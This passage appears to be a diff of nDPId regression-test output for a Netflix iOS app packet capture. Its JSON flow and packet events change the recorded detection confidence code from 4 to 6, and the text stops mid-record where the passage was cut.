00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1484319054101,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319054101,"pkt":"gCqoTGHM5JjWH70UCABFAABA9bFAAEAGZ9XAqAEHF\/YDjM+zAFBtwXYMAAAAALAC\/\/99\/AAAAgQFtAEDAwUBAQgKH2UImQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1484319054132,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319054132,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz7OFwt93bcF2DaAS\/\/\/aJAAAAgQFtAEDAwkEAggKhKDK7B9lCJk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1484319054134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319054134,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mQ1AAEAGxIXAqAEHF\/YDjM+zAFBtwXYNhcLfeIAQEBX4vQAAAQEICh9lCLmEoMrs"} -01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056204,"flow_last_seen":1484319056204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056204,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1484319056204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056204,"pkt":"gCqoTGHM5JjWH70UCABFAABAfy9AAEAG1l7AqAEHF\/YLhc+0AFDwxwoWAAAAALAC\/\/9XEAAAAgQFtAEDAwUBAQgKH2UQewAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056210,"flow_last_seen":1484319056210,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056210,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -192,7 +192,7 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1484319056219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056219,"pkt":"gCqoTGHM5JjWH70UCABFAAA0oIhAAEAGtRHAqAEHF\/YLhc+0AFDwxwoXZwEyloAQEBUoBwAAAQEICh9lEIg1aY+l"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056221,"flow_last_seen":1484319056221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056221,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1484319056221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056221,"pkt":"gCqoTGHM5JjWH70UCABFAABAtyBAAEAGnmXAqAEHF\/YLjc+3AFC7qylgAAAAALAC\/\/9syQAAAgQFtAEDAwUBAQgKH2UQiQAAAAAEAgAA"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056232,"flow_last_seen":1484319056232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056232,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1484319056232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056232,"pkt":"gCqoTGHM5JjWH70UCABFAABA7BpAAEAGaWvAqAEHF\/YLjc+4AFBql8CVAAAAALAC\/\/8mpAAAAgQFtAEDAwUBAQgKH2UQjAAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -209,13 +209,13 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Xt9AAEAG9rLAqAEHF\/YLjc+3AFC7qylhVgS+poAQEBUMigAAAQEICh9lEJq4h8Kl"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056241,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAABAWzRAAEAG+lHAqAEHF\/YLjc+8AFAt4\/K3AAAAALAC\/\/8xJAAAAgQFtAEDAwUBAQgKH2UQmgAAAAAEAgAA"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABAgCRAAEAG1WHAqAEHF\/YLjc+9AFCAerrsAAAAALAC\/\/8WUwAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABA6tRAAEAGarHAqAEHF\/YLjc++AFBtOQm6AAAAALAC\/\/\/axQAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7vga1YT37t1VqAS\/\/\/ATQAAAgQFtAEDAwkEAggKs1tjeh9lEJY="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7h\/u26MapfAlqAS\/\/8KPAAAAgQFtAEDAwkEAggKFFAqwB9lEIw="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7qJ1p961ZDNAaAS\/\/87aAAAAgQFtAEDAwkEAggKTYEN7B9lEJM="} @@ -224,19 +224,19 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gLJAAEAG1N\/AqAEHF\/YLjc+4AFBql8CWf7tujYAQEBUowwAAAQEICh9lEL4UUCrA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0s8BAAEAGodHAqAEHF\/YLjc+6AFDVkM0Bidafe4AQEBVZ9gAAAQEICh9lEL5NgQ3s"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1484319056279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056279,"pkt":"gCqoTGHM5JjWH70UCABFAAA0AZpAAEAGU\/jAqAEHF\/YLjc+5AFBMFfUFz2h9PYAQEBUYcgAAAQEICh9lEL40r6Zm"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 